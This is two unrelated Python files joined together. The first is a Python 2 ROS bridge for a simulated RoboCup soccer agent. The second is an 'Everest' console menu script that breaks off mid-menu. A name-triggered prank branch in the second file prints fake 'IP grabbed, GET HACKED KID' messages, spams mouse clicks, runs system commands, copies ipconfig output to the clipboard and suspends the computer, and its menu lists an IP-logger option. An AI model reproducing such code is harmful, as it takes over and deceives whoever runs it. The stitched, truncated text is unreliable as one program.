    self._serverSeenPlayers = []
    self._serverSeenLines = []
    self._serverMyPos = None
    self._serverMyOrien = None
    self._serverBallPos = None
def _populateServerValuesFromTree(self):
    """Parse self._serverTree (server->agent s-expression) into _server* fields (Python 2)."""
    self._initializeServerValues()
    for i in self._serverTree:
        if i[0] == 'time':
            self._serverTime = i[1][1]
        elif i[0] == 'GS':
            self._serverGameState = []
            for j in i[1:]:
                if j[0] == 'unum':
                    self._serverGameStateID = j[1]
                elif j[0] == 'team':
                    self._serverGameStateSide = j[1]
                elif j[0] == 't':
                    self._serverGameStateTime = j[1]
                elif j[0] == 'pm':
                    self._serverGameStatePlayMode = j[1]
                elif j[0] == 'sl':
                    self._serverGameStateScoreLeft = j[1]
                elif j[0] == 'sr':
                    self._serverGameStateScoreRight = j[1]
                else:
                    print "Unknown server game state type: " + j[0]
            # NOTE(review): assigning the *agent* init field from a server GS
            # message looks like a copy-paste leftover of the agent-side 'init'
            # handler — confirm whether this line should exist at all.
            self._agentInit = (i[1][1], i[2][1])
        elif i[0] == 'GYR':
            self._serverGyro = (i[1][1], i[2][1], i[2][2], i[2][3])
        elif i[0] == 'ACC':
            self._serverAccel = (i[1][1], i[2][1], i[2][2], i[2][3])
        elif i[0] == 'FRP':
            self._serverForceResistancePerceptors.append((i[1][1], (i[2][1], i[2][2], i[2][3]), (i[3][1], i[3][2], i[3][3])))
        elif i[0] == 'HJ':
            self._serverHingeJoints.append((i[1][1], i[2][1]))
        elif i[0] == 'hear':
            self._serverHear = i[1:]
        elif i[0] == 'See':
            for j in i[1:]:
                if j[0] == 'P':
                    # player record: [team, id, [(part, dist, theta, phi), ...]]
                    player = [j[1][1], j[2][1]]
                    bodyParts = []
                    for k in j[3:]:
                        if k[0] == 'head' or k[0] == 'rlowerarm' or k[0] == 'llowerarm' or k[0] == 'rfoot' or k[0] == 'lfoot':
                            bodyParts.append((k[0], k[1][1], k[1][2], k[1][3]))
                        else:
                            print "Unknown server player body part type: " + k[0]
                    player.append(bodyParts)
                    self._serverSeenPlayers.append(player)
                elif j[0] == 'L':
                    self._serverSeenLines.append(((j[1][1], j[1][2], j[1][3]), (j[2][1], j[2][2], j[2][3])))
                elif j[0] == 'B' or j[0] == 'G1L' or j[0] == 'G1R' or j[0] == 'G2L' or j[0] == 'G2R' or j[0] == 'F1L' or j[0] == 'F1R' or j[0] == 'F2L' or j[0] == 'F2R':
                    # Ball, goal posts, and corner flags share one polar format.
                    self._serverSeenObjects.append((j[0], j[1][1], j[1][2], j[1][3]))
                elif j[0] == 'mypos':
                    self._serverMyPos = (j[1], j[2], j[3])
                elif j[0] == 'myorien':
                    self._serverMyOrien = j[1]
                elif j[0] == 'ballpos':
                    self._serverBallPos = (j[1], j[2], j[3])
                else:
                    print "Unknown server vision type: " + j[0]
        else:
            print "Unknown server message type: " + i[0]
# == Public server methods ==
def makeTimeSExpr(self, time):
    """Build the '(time (now N))' message for the given simulation time."""
    return "(time (now %s))" % (time,)
def makeGameStateSExpr(self, gameTime, playMode, scoreLeft=None, scoreRight=None, uNum=None, side=None):
    """Build a (GS ...) game-state message.

    uNum and side are currently only sent once, right after an agent
    connects; side is either 'left' or 'right'. Score fields are included
    only when provided.
    """
    pieces = ["(GS"]
    if uNum is not None:
        pieces.append("(unum %s)" % (uNum,))
    if side is not None:
        pieces.append("(team %s)" % (side,))
    pieces.append("(t %s)" % (gameTime,))
    pieces.append("(pm %s)" % (playMode,))
    if scoreLeft is not None:
        pieces.append("(sl %s)" % (scoreLeft,))
    if scoreRight is not None:
        pieces.append("(sr %s)" % (scoreRight,))
    return " ".join(pieces) + ")"
def makeGyroSExpr(self, name, x, y, z):
    """Build a gyro-rate perceptor message: (GYR (n NAME) (rt X Y Z))."""
    return "(GYR (n %s) (rt %s %s %s))" % (name, x, y, z)

def makeAccelSExpr(self, name, x, y, z):
    """Build an accelerometer perceptor message: (ACC (n NAME) (a X Y Z))."""
    return "(ACC (n %s) (a %s %s %s))" % (name, x, y, z)

def makeHingeJointSExpr(self, name, ax):
    """Build a hinge-joint perceptor message: (HJ (n NAME) (ax ANGLE))."""
    return "(HJ (n %s) (ax %s))" % (name, ax)

def makeForceResistancePerceptorSExpr(self, name, px, py, pz, fx, fy, fz):
    """Build a foot force perceptor message (names: lf = left foot, rf = right foot)."""
    return "(FRP (n %s) (c %s %s %s) (f %s %s %s))" % (name, px, py, pz, fx, fy, fz)
def makeSeeSExpr(self, visionSExprs):
    """Wrap already-built vision s-expressions in a (See ...) message."""
    return "(See %s)" % (visionSExprs,)

# The builders below produce fragments that must be placed inside a See message.

def makeSeenObjectSExpr(self, name, distance, theta, phi):
    """Build a polar observation of a named object.

    Names: B (ball), G<1,2><L,R> (goal posts), F<1,2><L,R> (corner flags).
    """
    return "(%s (pol %s %s %s))" % (name, distance, theta, phi)

def makeSeenLineSExpr(self, distance1, theta1, phi1, distance2, theta2, phi2):
    """Build a field-line observation from its two endpoint bearings."""
    return "(L (pol %s %s %s) (pol %s %s %s))" % (distance1, theta1, phi1, distance2, theta2, phi2)

def makeSeenPlayerSExpr(self, team, id, bodyParts):
    """Build a seen-player observation.

    bodyParts is an iterable of (partName, distance, theta, phi); valid part
    names are head, rlowerarm, llowerarm, rfoot, lfoot.
    """
    ret = "(P (team %s) (id %s)" % (team, id)
    for part in bodyParts:
        ret = ret + " (%s (pol %s %s %s))" % (part[0], part[1], part[2], part[3])
    return ret + ")"

def makeGroundTruthMyPosSExpr(self, x, y, z):
    """Build the ground-truth own-position fragment."""
    return "(mypos %s %s %s)" % (x, y, z)

def makeGroundTruthMyOrienSExpr(self, angle):
    """Build the ground-truth own-orientation fragment."""
    return "(myorien %s)" % (angle,)

def makeGroundTruthBallPosSExpr(self, x, y, z):
    """Build the ground-truth ball-position fragment."""
    return "(ballpos %s %s %s)" % (x, y, z)

def makeHearSExpr(self, teamName, time, self_or_direction, message):
    """Build a hear message; the team name field is omitted when teamName is None."""
    if teamName is None:
        return "(hear %s %s %s)" % (time, self_or_direction, message)
    return "(hear %s %s %s %s)" % (teamName, time, self_or_direction, message)
def makeSExprForAgent(self):
    """Assemble the full server->agent message from cached server state.

    Fragments are emitted in protocol order: time, game state, gyro, accel,
    vision (See), force perceptors, hear, hinge joints. Fragments whose
    backing state is unset are skipped.
    """
    parts = []
    if self._serverTime is not None:
        parts.append(self.makeTimeSExpr(self._serverTime))
    if self._serverGameStateTime is not None and self._serverGameStatePlayMode is not None:
        parts.append(self.makeGameStateSExpr(
            self._serverGameStateTime, self._serverGameStatePlayMode,
            self._serverGameStateScoreLeft, self._serverGameStateScoreRight,
            self._serverGameStateID, self._serverGameStateSide))
    if self._serverGyro is not None:
        parts.append(self.makeGyroSExpr(*self._serverGyro))
    if self._serverAccel is not None:
        parts.append(self.makeAccelSExpr(*self._serverAccel))
    # Emit a See message only when there is at least one vision item.
    if (self._serverSeenObjects or self._serverSeenPlayers or self._serverSeenLines
            or self._serverMyPos is not None or self._serverMyOrien is not None
            or self._serverBallPos is not None):
        vision = []
        for obj in self._serverSeenObjects:
            vision.append(self.makeSeenObjectSExpr(obj[0], obj[1], obj[2], obj[3]))
        for ply in self._serverSeenPlayers:
            vision.append(self.makeSeenPlayerSExpr(ply[0], ply[1], ply[2]))
        for ln in self._serverSeenLines:
            vision.append(self.makeSeenLineSExpr(ln[0][0], ln[0][1], ln[0][2], ln[1][0], ln[1][1], ln[1][2]))
        if self._serverMyPos is not None:
            vision.append(self.makeGroundTruthMyPosSExpr(self._serverMyPos[0], self._serverMyPos[1], self._serverMyPos[2]))
        if self._serverMyOrien is not None:
            vision.append(self.makeGroundTruthMyOrienSExpr(self._serverMyOrien))
        if self._serverBallPos is not None:
            vision.append(self.makeGroundTruthBallPosSExpr(self._serverBallPos[0], self._serverBallPos[1], self._serverBallPos[2]))
        parts.append(self.makeSeeSExpr("".join(vision)))
    for frp in self._serverForceResistancePerceptors:
        parts.append(self.makeForceResistancePerceptorSExpr(
            frp[0], frp[1][0], frp[1][1], frp[1][2], frp[2][0], frp[2][1], frp[2][2]))
    if self._serverHear is not None:
        # A 3-element hear has no team name; a 4-element one does.
        if len(self._serverHear) == 3:
            parts.append(self.makeHearSExpr(None, self._serverHear[0], self._serverHear[1], self._serverHear[2]))
        else:
            parts.append(self.makeHearSExpr(self._serverHear[0], self._serverHear[1], self._serverHear[2], self._serverHear[3]))
    for hinge in self._serverHingeJoints:
        parts.append(self.makeHingeJointSExpr(hinge[0], hinge[1]))
    return "".join(parts)
def onServerUpdate(self, data):
    """ROS callback for AgentState messages: refresh the cached _server* fields.

    Runs on the subscriber thread; all shared state is updated under
    self.mutex. Perception (landmarks/lines) is throttled to one update per
    60 ms of sim time.
    """
    self.mutex.acquire()
    # Check elapsed time since the last update.
    #elapsed_time = (data.sim_time.to_sec() - self._lastStateTime.to_sec()) * 1000.0
    #if elapsed_time < 19.0:
    #    self.mutex.release()
    #    return;
    #print 'Elapsed_time: ', elapsed_time
    #print 'Sim time:', data.sim_time.to_sec()
    # Clear all values
    self._initializeServerValues()
    # Changing the time
    self._serverTime = data.sim_time.to_sec()
    # Update the game state.
    self._serverGameStatePlayMode = data.game_state.play_mode
    self._serverGameStateScoreLeft = data.game_state.score_left
    self._serverGameStateScoreRight = data.game_state.score_right
    self._serverGameStateTime = data.game_state.time.to_sec()
    # Update joint state.
    for i in range(len(data.joint_name)):
        self._serverHingeJoints.append((data.joint_name[i], data.joint_angle_1[i]))
        print data.joint_name[i], ':', data.joint_angle_1[i]
    # Set the gyro values
    #print self._serverGyro
    # NOTE(review): _initializeServerValues() above just set _serverGyro and
    # _serverAccel to None, so these two branches can never run and the IMU
    # data is never forwarded — confirm whether the guards are inverted.
    if self._serverGyro != None:
        self._serverGyro = ('torso', data.gyro_angular[0].x, data.gyro_angular[0].y, data.gyro_angular[0].z)
    if self._serverAccel != None:
        self._serverAccel = ('torso', data.gyro_linear[0].x, data.gyro_linear[0].y, data.gyro_linear[0].z)
    # Set the force sensor values
    # Update timestamp
    self._lastStateTime = data.sim_time
    # Throttle perception updates: skip unless 60 ms of sim time has passed.
    elapsed_time = (data.sim_time.to_sec() - self._lastPerceptionTime.to_sec()) * 1000.0
    if elapsed_time < 60.0:
        self.mutex.release()
        return;
    #print "Perception update"
    self._updatesCounter = 0;
    # Update perception every three cycles.
    # Set the perception
    for landmark in data.landmarks:
        self._serverSeenObjects.append((landmark.name, landmark.bearing.distance, landmark.bearing.angle1, landmark.bearing.angle2))
    for line in data.lines:
        self._serverSeenLines.append(((line.bearings[0].distance, line.bearings[0].angle1, line.bearings[0].angle2), (line.bearings[1].distance, line.bearings[1].angle1, line.bearings[1].angle2)))
    # Update perception timestamp
    self._lastPerceptionTime = data.sim_time
    self.mutex.release()
def initAgent(self, team, number):
    """Spawn a NAO model via the gameController init_agent service (Python 2).

    Returns the service's `result` field, or None if the call fails.
    """
    rospy.wait_for_service('/gameController/init_agent')
    try:
        init_agent_f = rospy.ServiceProxy('/gameController/init_agent', InitAgent)
        path = os.path.join(config.ModelResourcesDir, 'nao_models/nao_soccer.sdf')
        resp = init_agent_f(path, team, number)
        return resp.result
    except rospy.ServiceException, e:
        print "Service call failed: %s"%e
def moveAgent(self, player_id, x, y, theta):
    """Teleport an agent via the move_agent service (Python 2).

    NOTE(review): `player_id` is ignored — the call hard-codes ('teamA', 1);
    confirm whether player_id should be passed through instead.
    """
    rospy.wait_for_service('/gameController/move_agent')
    try:
        move_agent_f = rospy.ServiceProxy('/gameController/move_agent', MoveAgentPose)
        pos = Beam()
        pos.x = x
        pos.y = y
        pos.theta = theta
        move_agent_f('teamA', 1, None, pos)
    except rospy.ServiceException, e:
        print "Service call failed: %s"%e
def sendJoints(self):
    """Forward the agent's 22 joint commands to the sim via SendJoints (Python 2).

    Silently does nothing unless exactly 22 joint requests are cached.
    """
    rospy.wait_for_service('/teamA_1/send_joints')
    try:
        # if the list of joint commands is not 22, just return.
        if len(self._agentJointRequests) != 22:
            return
        send_joints_f = rospy.ServiceProxy('/teamA_1/send_joints', SendJoints)
        # Create a dictionary from the list
        toServer = {}
        #print 'agent joint request:'
        #print self._agentJointRequests
        for joint in self._agentJointRequests:
            #print 'joint:'
            #print joint
            toServer[joint[0]] = float(joint[1])
        # Flatten into the fixed order the service expects:
        # head, left leg, left arm, right leg, right arm.
        # NOTE(review): lae4 precedes lae3 (and rae4 precedes rae3); presumably
        # this matches the server's joint indexing — confirm before "fixing".
        newJoints = []
        newJoints.append(toServer['he1'])
        newJoints.append(toServer['he2'])
        newJoints.append(toServer['lle1'])
        newJoints.append(toServer['lle2'])
        newJoints.append(toServer['lle3'])
        newJoints.append(toServer['lle4'])
        newJoints.append(toServer['lle5'])
        newJoints.append(toServer['lle6'])
        newJoints.append(toServer['lae1'])
        newJoints.append(toServer['lae2'])
        newJoints.append(toServer['lae4'])
        newJoints.append(toServer['lae3'])
        newJoints.append(toServer['rle1'])
        newJoints.append(toServer['rle2'])
        newJoints.append(toServer['rle3'])
        newJoints.append(toServer['rle4'])
        newJoints.append(toServer['rle5'])
        newJoints.append(toServer['rle6'])
        newJoints.append(toServer['rae1'])
        newJoints.append(toServer['rae2'])
        newJoints.append(toServer['rae4'])
        newJoints.append(toServer['rae3'])
        send_joints_f(newJoints)
    except rospy.ServiceException, e:
        print "Service call failed: %s"%e
def run(self, s):
    """Service one agent connection (Python 2; blocks forever on socket `s`).

    Reads the agent's first message, spawns its sim model, subscribes to its
    ROS state topic, then loops: wait for fresh server state, send it to the
    agent, read the agent's reply, and forward joint commands to the sim.
    """
    # Messages are length-prefixed with a 4-byte network-order unsigned int.
    msgSize = s.recv(4)
    msgSize = struct.unpack("!L", msgSize)
    #print msgSize[0]
    msg = s.recv(msgSize[0])
    #print "From agent: " + msg
    self._agentTree = self._getTreeFromSExpr(msg)
    self._populateAgentValuesFromTree()
    #print self.agentTree
    #self.printAgentValues()
    #sserver = socket.socket() # Create a sock et object
    #host = socket.gethostbyname("localhost")
    #print host
    #sserver.connect((host, 3100))
    # NOTE(review): team name and agent number are hard-coded here.
    robot_id = self.initAgent('teamA', 0)
    rospy.Subscriber("/teamA_" + str(robot_id) + "/state", AgentState, self.onServerUpdate)
    #self.moveAgent(1, 0, 0, 0)
    while True:
        self.mutex.acquire()
        # Spin (1 ms sleeps) until a server state newer than our last send arrives.
        if self._lastMessageSentTime >= self._lastStateTime:
            self.mutex.release()
            time.sleep(.001)
            continue
        print self._lastMessageSentTime, self._lastStateTime, self._serverTime
        self._lastMessageSentTime = self._lastStateTime
        #msgToServer = struct.pack("!I", len(msg)) + msg
        #sserver.send(msgToServer)
        #msgSize = sserver.recv(4)
        #msgSize = struct.unpack("!L", msgSize)
        #print msgSize[0]
        #msgFromServer = sserver.recv(msgSize[0])
        #print "From server: " + msgFromServer
        #self._serverTree = self._getTreeFromSExpr(msgFromServer)
        #print self._serverTree
        #self._populateServerValuesFromTree()
        # Hardcoding the uniform number and side.
        msgForAgent = self.makeSExprForAgent()
        self.mutex.release()
        # print "Message for agent: " + msgForAgent
        msgToAgent = struct.pack("!I", len(msgForAgent)) + msgForAgent
        #msgToAgent = struct.pack("!I", len(msgFromServer)) + msgFromServer
        s.send(msgToAgent)
        msgSize = s.recv(4)
        msgSize = struct.unpack("!L", msgSize)
        #print msgSize[0]
        msg = s.recv(msgSize[0])
        print "From agent: " + msg
        self._agentTree = self._getTreeFromSExpr(msg)
        self._populateAgentValuesFromTree()
        # Send joints to the server
        self.sendJoints()
        #print self.agentTree
        #print self.agentValues
        #print self.values
        self.printAgentValues()
# Entry point: parse optional [host] [port] args, then accept agent
# connections and serve each on its own thread (Python 2).
#sys.argv = [sys.argv[0], 'localhost', 3400]
if len(sys.argv) > 1 and sys.argv[1] == "--help":
    print "Usage: " + sys.argv[0] + " [host] [port]"
    sys.exit()
host = "localhost"
if len(sys.argv) > 1:
    host = sys.argv[1]
port = 3100
if len(sys.argv) > 2:
    port = int(sys.argv[2])
try:
    #create an AF_INET, STREAM socket (TCP)
    # NOTE(review): `s` is never used below except the final (unreachable)
    # s.close(); the listening socket is `serversocket`.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error, msg:
    print 'Failed to create socket. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1]
    sys.exit();
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    host = socket.gethostbyname( host )
except socket.gaierror:
    #could not resolve
    print 'Hostname could not be resolved. Exiting'
    sys.exit()
rospy.init_node('listener', anonymous=True)
#Connect to remote server
serversocket.bind((host, port))
# Listen with a backlog of 22 pending connections.
serversocket.listen(22)
while True:
    #accept connections from outside
    (clientsocket, address) = serversocket.accept()
    #now do something with the clientsocket
    #in this case, we'll pretend this is a threaded server
    print 'Got connection from', address
    aI = agentInterface()
    #aI.run(clientsocket)
    t = threading.Thread(target = aI.run, args = (clientsocket,))
    t.start()
    #ct = client_thread(clientsocket)
    #ct.run()
# Unreachable: the accept loop above never exits.
s.close()
|
PixelGraphing.py | try:
    # Unused leftover variable from development.
    y=0
    import os
    import webbrowser
    from os import path, system
    import pyautogui
    import time
    from matplotlib import pyplot as plt
    import numpy as np
    from PIL import Image
    import sys
    import time
    from colorama import init, Fore, Back, Style
    import logging
    import datetime
    import getpass
    import socket
    from selenium import webdriver
    import itertools
    import threading
    import playsound
except ImportError:
    # Best-effort auto-install of dependencies, then ask the user to rerun.
    # NOTE(review): `system` comes from `from os import path, system` above;
    # if the ImportError fired before that line, these calls raise NameError.
    print("Trying to install the required modules! THIS MAY DISPLAY LARGE ERRORS!\nPlease try to run this script again once all of the modules have been successfully installed.\n\n")
    input("press enter to start installing... ")
    system("py -m pip install -r requirements.txt")
    system("python -m pip install -r requirements.txt")
    system("python3 -m pip install -r requirements.txt")
    input("\n\ndone installing modules! please restart the script now. Press enter to continue... ")
    quit()
init()
print('Launching "Everest"...')

def _run_spinner(chars, seconds):
    """Show a console spinner cycling through *chars* for roughly *seconds* seconds.

    Replaces two copy-pasted spinner blocks that shared one module-global
    `done` flag: resetting that flag for the second spinner could leave the
    first spinner thread running forever alongside the second. Each call now
    owns its stop flag and joins its worker thread before returning.
    """
    state = {'stop': False}

    def _animate():
        for frame in itertools.cycle(chars):
            if state['stop']:
                break
            sys.stdout.write('\rloading... ' + frame)
            sys.stdout.flush()
            time.sleep(0.1)

    worker = threading.Thread(target=_animate)
    worker.start()
    time.sleep(seconds)  # the "long process" being masked by the spinner
    state['stop'] = True
    worker.join()

_run_spinner(['|', '/', '-', '\\'], 2)
print(' Starting...')
_run_spinner(['}', '.', '[', '\\'], 3)
# Windows console-clear helper; defined but the code below calls
# system('cls') directly instead.
cls = lambda: system('cls')
Sound=input(' Do you want to play music y/n: ')
if Sound=="y":
    # Shadows `from os import path` with the music folder path.
    path = './Music'
    files = os.listdir(path)
    for f in files:
        print(f)
    PickaMusic=input(' What music would you like to play:')
    # NOTE(review): plays the bare filename relative to the CWD; probably
    # needs os.path.join(path, PickaMusic) — confirm.
    playsound.playsound(PickaMusic, False)
if Sound == "n":
    system('cls')
system('cls')
# Animated ASCII banner; each line is revealed with a 0.3 s delay.
print(Fore.GREEN + " โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ")
time.sleep(0.3)
print(Fore.GREEN + " |___ _ |")
time.sleep(0.3)
print(Fore.GREEN + " || __|__ __ ___ _ _ ___ ___| |_|")
time.sleep(0.3)
print(Fore.GREEN + " || _| \ V // -_)| '_|/ -_)(_-/| _|")
time.sleep(0.3)
print(Fore.GREEN+ " ||___| \_/ \___||_| \___|/__/ \__|")
time.sleep(0.3)
print(Fore.GREEN + " โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ")
# BUG FIX: this expression previously had no print() around it, so the date
# string was built and silently discarded instead of being displayed.
print(Fore.MAGENTA + "Date: %s" % time.ctime())
time.sleep(0.3)
# Typewriter effect: re-print the growing prefix on the same line ('\r').
string = 'Follow me on Twitter! @LaiBranden...'
substr = ""
for char in string:
    substr += char
    print(substr, end="\r")
    time.sleep(0.03)
print('Welcome to Everest..., '+getpass.getuser()+"!")
print(Fore.WHITE + socket.gethostname() + Fore.WHITE + '!')
string ='Welcome to Everest..., '+getpass.getuser()+"!"
substr = ""
for char in string:
    substr += char
    print(substr, end="\r")
    time.sleep(0.03)
print('Welcome')
# Prompt for a username; several hard-coded names trigger easter-egg branches.
name = str(input(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.GREEN+'> What is your Username?: '))
x=name
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +"Hello" + " "+name + "!")
if name == 'Branden Lai':
    # Prank branch: floods the console with fake "hacking" output, runs
    # harmless shell commands, spams mouse clicks, copies ipconfig output to
    # the clipboard, and finally suspends the machine before exiting.
    print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.GREEN + 'Ethernet adapter Radmin VPN: Connection-specific DNS Suffix Disconnected... Ip:192.432.432 Connected... Connection Radmin Unistalled...Ethernet adapter VirtualBox Host-Only Network...Ip Grabbed Successful...Media disconnected...Wireless LAN adapter Wi-Fi Disconnected...Tunnel adapter Teredo Tunneling Pseudo-Interface Connected...Port:2138 Tunneled...Ip Grabbed...Requirement already satisfied:...Requirement already satisfied:...Requirement already satisfied:...Requirement already satisfied: Path:C:/Users/Lib/Desktop/Image Project/697033-32983.jpg Installed...Requirement already satisfied...Requirement already satisfied...Requirement already satisfied...Requirement already satisfied...Requirement already satisfied... GET HACKED KID :D ')
    system("pip3 install aiohttp")
    system("ipconfig")
    print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.BLUE + "https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...")
    pyautogui.click(x=310, y=618)
    pyautogui.click(x=310, y=218)
    pyautogui.click(x=310, y=218)
    pyautogui.click(x=310, y=618)
    pyautogui.click(x=310, y=418)
    pyautogui.click(x=310, y=418)
    pyautogui.click(x=310, y=418)
    # NOTE(review): passing ANSI color codes into os.system just garbles the
    # command string; these two calls likely fail or echo junk — confirm.
    system(Fore.MAGENTA+"ipconfig")
    system(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +"prompt Branden Lai Is OP get Rick ROlled")
    time.sleep(2)
    system("ipconfig")
    pyautogui.click(x=310, y=218)
    system("ipconfig")
    pyautogui.click(x=310, y=218)
    system("ipconfig")
    system("ipconfig")
    pyautogui.click(x=310, y=218)
    system("ipconfig")
    pyautogui.click(x=310, y=218)
    system("ipconfig")
    pyautogui.click(x=310, y=218)
    system("pip3 install asyncio")
    system("tree")
    system("pip install beautifulsoup4")
    system("ipconfig")
    pyautogui.click(x=310, y=218)
    system("ipconfig")
    pyautogui.click(x=310, y=218)
    system("ipconfig")
    system("tree")
    system("tree")
    pyautogui.click(x=310, y=218)
    system("tree")
    system("tree")
    pyautogui.click(x=310, y=218)
    system("title MY COMPUTER NOW")
    print("Look at your cmd title :>")
    system("tree")
    pyautogui.click(x=310, y=218)
    pyautogui.click(x=310, y=218)
    pyautogui.click(x=310, y=218)
    pyautogui.click(x=310, y=218)
    system("tree")
    pyautogui.click(x=310, y=218)
    system("tree")
    pyautogui.click(x=310, y=218)
    pyautogui.click(x=310, y=218)
    pyautogui.click(x=310, y=218)
    pyautogui.click(x=310, y=218)
    system("tree")
    pyautogui.click(x=310, y=218)
    pyautogui.click(x=310, y=218)
    pyautogui.click(x=310, y=218)
    pyautogui.click(x=310, y=218)
    pyautogui.click(x=310, y=218)
    pyautogui.click(x=310, y=218)
    pyautogui.click(x=310, y=218)
    print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +"I Told you Not to enter my Name :)")
    print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +"Ip grabbed :) Get Rick Rolled Kid :D https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...")
    time.sleep(2)
    print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.CYAN + 'Ok BYE BYE :>')
    pyautogui.click(x=310, y=218)
    print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.CYAN + 'I told you not to enter my name KID Listen :) Byeeee')
    system("tree")
    print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.CYAN + 'I told you not to enter my name KID Listen :) Byeeee')
    pyautogui.click(x=310, y=218)
    print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.CYAN + 'I told you not to enter my name KID Listen :) Byeeee')
    system("ipconfig | clip")
    pyautogui.click(x=310, y=3218)
    print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.CYAN + 'I told you not to enter my name KID Listen :) Byeeee')
    print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.CYAN + 'I told you not to enter my name KID Listen :) Byeeee')
    pyautogui.click(x=310, y=218)
    system("ipconfig/all")
    system("ipconfig | clip")
    pyautogui.click(x=310, y=3218)
    system("nslookup google.com")
    system("ipconfig | clip")
    system("tree")
    system("ipconfig | clip")
    pyautogui.click(x=310, y=218)
    system("ipconfig | clip")
    pyautogui.click(x=310, y=218)
    system("ipconfig | clip")
    system("wmic product get name")
    system("tree")
    # Suspends/sleeps the machine on Windows.
    system("RUNDLL32.EXE powrprof.dll,SetSuspendState 0,1,0")
    exit()
else:
    if name == 'Jason Choe':
        print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.BLUE + "You are my Best friend Forever! Thanks for everything you have done!!! Thanks for the cakes!")
        exit()
    else:
        if name == 'Benjamin King':
            print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.RED + "Thanks for Being my Best friend! I owe you big time!")
            exit()
        else:
            if name == 'Danny Kim':
                print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.GREEN + "We will Miss you in korea!!! Make sure to keep in contact with us.")
                exit()
            else:
                if name == 'Sriram Sivakumar':
                    # No exit() here: this branch falls through to the age gate.
                    print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.GREEN + 'Thanks for teaching me coding and using your own time for me! Please keep teaching me and Thanks so much!!!')
                else:
                    if name == 'Everest':
                        print(Fore.RED + '[Admin]')
# Age gate: anyone under 12 is turned away.
Age = int(input(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.CYAN + '> What is your age?: '))
if Age >= 12:
    print('')
else:
    print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.CYAN + 'Sorry! You are too young. Come back when your 12 and older!')
    exit()
# Main menu. Option 1 renders an image as ASCII art ("#" for light pixels,
# " " for dark); options 2-4 are handled further below.
option = int(input(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +'[1]: Pixel!:, [2]:Discord(DM)!:, [3]:HandSniperBot(Minecraft):, [4]:IpLoggerLink: '))
if option == 1:
